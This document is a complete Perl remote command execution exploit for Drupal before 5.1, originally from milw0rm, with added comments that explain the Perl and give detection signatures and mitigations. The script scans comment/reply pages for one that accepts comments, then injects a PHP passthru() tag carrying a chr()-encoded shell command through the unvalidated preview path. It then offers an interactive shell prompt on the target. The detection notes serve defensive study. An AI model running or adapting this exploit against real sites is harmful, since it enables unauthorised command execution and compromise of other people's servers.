
Drupal < 5.1 (post comments) Remote Command Execution Exploit v2

Drupal < 5.1 (post comments) Remote Command Execution Exploit v2

#!/usr/bin/perl

#
# $Id: milw0rm_drupalv5.pl,v 0.2 2007/02/15 13:40:29 str0ke Exp $
#
# milw0rm_drupalv5.pl - Drupal < 5.1 Remote Command Execution Exploit
# Copyright (c) 2007 str0ke <str0ke[!]milw0rm.com>
#
# Description
# -----------
# Previews on comments were not passed through the normal form validation routines,
# enabling users with the 'post comments' permission and access to more than one
# input filter to execute arbitrary code. By default, anonymous and authenticated
# users have access to only one input format.
# Immediate workarounds include: disabling the comment module, revoking the 'post
# comments' permission for all users, or limiting access to one input format.
# Versions affected
# -----------------
# - Drupal 5.x versions before Drupal 5.1
#
# [02/15/2007] The exploit has been fixed. /str0ke
#

use strict;
use LWP::UserAgent;

# Command-line handling: host (required), web root of the Drupal install
# (defaults to "/drupal"), optional HTTP proxy.  None of the three values is
# validated before being interpolated into URLs below.  `&usage` is the
# ampersand call form, which also passes the caller's current @_ along;
# harmless here because usage() ignores its arguments and exits.
my $host  = shift || &usage;
my $dir  = shift || "/drupal";
my $proxy = shift;
# File-scope; assigned from STDIN in the interactive loop further down.
# The identically named lexical declared inside exploit() shadows it there.
my $command;

# Only `use strict` is enabled at the top of the file, no `use warnings`.
my $conn = LWP::UserAgent->new();
# `unless !$proxy` is a double negation: the proxy is set only when one was
# given on the command line.
$conn -> proxy("http", "http://".$proxy."/") unless !$proxy;

# Prints the usage banner and terminates.  Reached via `&usage` when no host
# argument is supplied.  Exits with status 0 even though it is the error path,
# so a caller script cannot distinguish "no arguments" from success.
sub usage()
{
  print "[?] Drupal < 5.1 Remote Command Execution Exploit\n";
  print "[?] Copyright (c) 2007 str0ke <str0ke[!]milw0rm.com>\n";
  print "[?] usage: perl $0 [host] [directory] [proxy]\n";
  print "   [host] (ex. www.milw0rm.com)\n";
  print "   [directory] (ex. /drupal)\n";
  print "   [proxy] (ex. 0.0.0.0:8080)\n";
  exit;
}

# Sends one comment-preview POST carrying a PHP tag to the target and prints
# whatever the target echoed back between the start_er / end_er markers.
#   $_[0]  node/comment id used in the comment/reply/<id> path
#   $_[1]  shell command to run on the target; defaults to 'ls -l'
# The empty `()` prototype means the sub must be called as `&exploit(...)`
# (the ampersand form bypasses prototype checking); a plain `exploit($i)`
# would fail to compile with "Too many arguments".
sub exploit()
{
  my $i = $_[0];
  my $command = $_[1] || &#39;ls -l&#39;;   # shadows the file-scope $command
  # Wraps the command in echo markers so its output can be cut out of the
  # returned HTML by the regex below.
  my $cmd    = &#39;echo start_er;&#39;.$command.&#39;;&#39;.&#39;echo end_er&#39;;

  # Encodes every byte of $cmd as a chr(N).chr(N)... PHP expression.  The
  # assignment to $_ inside the map block is unnecessary (the block's value is
  # what map collects) and is the "map for side effects" pattern.
  # DETECTION: a long run of `chr(NNN).` in a request body is the signature
  # of this encoder; it is worth an IDS/WAF rule on its own.
  my $byte = join(&#39;.&#39;, map { $_ = &#39;chr(&#39;.$_.&#39;)&#39; } unpack(&#39;C*&#39;, $cmd));
  
  my $req = HTTP::Request->new(POST => "http://" . $host . $dir . "/?q=comment/reply/" . $i);
  $req -> content_type(&#39;application/x-www-form-urlencoded&#39;);
  # The comment field holds a PHP tag calling passthru(); format=2 selects a
  # second input format (the header notes the bug needs access to more than
  # one), and op=Preview comment drives the unvalidated preview path.  The
  # form fields are not URL-encoded (note the spaces in subject and op).
  # DETECTION: POST to ?q=comment/reply/<n> with op=Preview comment whose
  # comment field contains `<?passthru(`; MITIGATION: Drupal 5.1 or the
  # workarounds listed in the file header.
  $req -> content(&#39;subject=My daddy beats me&comment=<?passthru(&#39;.$byte.&#39;);?>&format=2&form_id=comment_form&op=Preview comment&#39;);

  # Despite the name, $content is the HTTP::Response object, not the body.
  my $content = $conn->request($req);
  
  # /ms lets `.` span newlines in the response body.  $1 is copied on the
  # very next statement, before anything else can clobber it.
  if ($content->content =~ m/start_er(.*?)end_er/ms) {
    my $out = $1;

    # Tests Perl truthiness rather than the match: a command whose only output
    # is "" or "0" is reported as a failure and the script exits.
    if ($out) {
      print "$out\n";
    } else {
      print "[-] Exploit Failed...\n";
      exit;
    }  
  }  
  # No marker match at all (e.g. a patched target): returns silently, no
  # message, and the interactive loop in the caller just prompts again.
}

# Scans comment/reply/1 .. comment/reply/400 with plain GETs and stops at the
# first page whose body contains "add new comment", i.e. a node that accepts
# comments from this client.  Only the first hit is ever used.
# DETECTION: up to 400 sequential GETs for ?q=comment/reply/<n> from one
# client, followed by POSTs to the first successful id, is this script's
# traffic pattern in web-server logs.
for my $i ( 1 .. 400 ) {
  my $output = $conn -> get("http://" . $host . $dir . "/?q=comment/reply/" . $i);

  if($output -> is_success)
  {
    if($output -> content =~ /add new comment/)
    {
      print "[+] found comment/reply: $i\n";

      # First call runs exploit()'s default command ('ls -l').
      &exploit($i);
      
      # `while()` with an empty condition is an infinite loop in Perl; it
      # only ends through the `exit` below.
      while()
      {
        print "str0kin-drupal\$ ";
        # On EOF <STDIN> returns undef, so $command becomes undef (chomp warns
        # only if warnings were on) and the next line exits.  Entering "0"
        # also exits, because "0" is false in Perl.
        chomp($command = <STDIN>);
        exit unless $command;
        &exploit($i, $command);
      }
      exit;   # unreachable: the while() above never falls through
    }
  }
}

# Reached only when none of ids 1..400 accepted comments.
print "[-] Exploit Failed...\n";
